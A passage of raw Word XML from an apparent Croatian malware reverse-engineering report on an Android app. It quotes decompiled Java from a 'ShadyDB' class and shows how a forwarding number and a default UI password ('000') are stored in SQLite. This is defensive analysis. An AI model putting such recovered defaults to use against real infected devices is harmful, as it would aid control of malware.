        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Otkriti vrijednost varijable </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRDefault="0031725F" w:rsidP="0031725F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Traženjem riječi „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>” dođe se do sljedećeg odsječka koda:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0086242F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">try </w:t>
      </w:r>
      <w:r w:rsidR="0031725F" w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>ShadyDB shadydb = new ShadyDB(context);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">                SQLiteDatabase sqlitedatabase = shadydb.getReadableDatabase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">                Cursor cursor1 = sqlitedatabase.query("settings", null, null, null, null, null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                cursor1.moveToFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                DBforwardingNo = cursor1.getString(cursor1.getColumnIndex("phone_no"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DB_ui_pass = cursor1.getString(cursor1.getColumnIndex("ui_pass"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                DBactivate = cursor1.getString(cursor1.getColumnIndex("activate"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                System.out.println((new StringBuilder("+++++++++++jjj+++++++++++++")).append(DBactivate).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                cursor1.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                sqlitedatabase.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                shadydb.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Log.d("Database:Forwarding Numbers", DB_ui_pass);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            catch(Exception exception)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                Log.d("Database:OnClickListener::", (new StringBuilder("Crap!!failed to Retrieve Information ")).append(exception.toString()).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0031725F" w:rsidRPr="0086242F" w:rsidRDefault="0031725F" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD4512" w:rsidRDefault="0031725F" w:rsidP="00594343">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Iz koda se primjećuje da se varijabla inicijalizira metodom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>getString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> čiji argument je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>cursor1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koji poziva metodu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>getColumnIndex</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, a ta metoda vraća vrijednost varijable </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ui_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Cursor1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> je varijabla tipa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Cursor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koji je sučelje koje omogućuje slučajan ulazno-izlazni pristup </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>rezultatima postavlje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">nima </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>izrazom baze podataka</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">, a inicijalizira se preko </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>metode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>sqlilitedatabase</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.query(...)</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Sqllitedatabase</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> je varijabla tipa </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SqlLiteDabase</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja pruža metode upravljanja SQLLite bazom podataka, a inicijalizira se pomoću varijable </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>shadydb</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> i njene metode </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>getReadableDatabase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>. Daljnjom reve</w:t>
      </w:r>
      <w:r w:rsidR="00C97C82">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">znom analizom se saznaje da je </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>shadydb</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> instanca razreda </w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r w:rsidR="00594343">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koje je sadržan u paketu programa. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="00594343" w:rsidP="00DD4512">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Dakle, do varijable </w:t>
      </w:r>
      <w:r w:rsidRPr="00594343">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se stiže preko instance razreda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koji</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> služi za upravljanje bazom podataka i sadržava varijablu </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ui_pass</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> u kojoj je zapisana zadana lozinka što dovodi da razred </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> mora biti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">sljedeći </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>objekt analize.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRDefault="00594343" w:rsidP="00DD4512">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Odsječak koda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> razreda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>public class ShadyDB extends SQLiteOpenHelper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    public ShadyDB(Context context1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        super(context1, "shady.db", null, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        context = context1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    public void onCreate(SQLiteDatabase sqlitedatabase)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        sqlitedatabase.execSQL("create table settings( _id integer primary key autoincrement, phone_no text not null, activate text not null, ui_pass text not null);");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("create table settings( _id integer primary key autoincrement, phone_no text not null, activate text not null, ui_pass text not null);");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00594343" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("INSERT INTO settings (phone_no, activate, ui_pass) VALUES( '0000', 'Activate', '000');".toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRPr="0086242F" w:rsidRDefault="00594343" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sqlitedatabase.execSQL("INSERT INTO settings (phone_no, activate, ui_pass) VALUES( '0000', 'Activate', '000');");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD4512" w:rsidRPr="00DD4512" w:rsidRDefault="00DD4512" w:rsidP="00594343">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00711A86" w:rsidRDefault="00594343" w:rsidP="00711A86">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Razred </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ShadyDB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> nasljeđuje razred </w:t>
      </w:r>
      <w:r w:rsidR="00DD4512">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLiteOpenHelper koja je pomoćna klasa za upravljanje bazom podataka. Metoda </w:t>
